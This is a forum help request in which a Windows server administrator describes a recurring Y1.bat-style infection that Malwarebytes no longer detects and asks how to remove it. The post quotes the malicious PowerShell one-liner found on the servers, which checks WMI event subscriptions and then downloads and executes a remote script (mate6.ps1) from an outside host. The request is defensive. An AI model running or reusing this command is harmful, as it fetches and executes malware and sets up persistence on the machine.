Showing results for tags 'mate6.ps1'.
Hi, I have two Windows servers (2008 and SBS2011) and both were infected with a Y1.bat variant. I ran some scripts and apparently removed it from the system. I currently have Malwarebytes EndPoint installed, and from time to time the anti-exploit shows a message blocking some IP address from access, but nobody uses this server as a workstation.

Now apparently the malware has come back, but as a different variant, and when I scan with Malwarebytes no infection appears. I downloaded and scanned with the Anti-Rootkit and nothing appeared. I see that the %temp% folder is redirected to a Temp\1 folder (same as the last time). I am not sure how to properly remove this threat. Any suggestion will be appreciated.

Before, I discovered the following script, which I properly removed:

powershell -nop "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}"

The following link explained how to remove it in the past: https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved
11 replies

Tagged with: possible y1.bat variant, mate6.ps1 (and 2 more)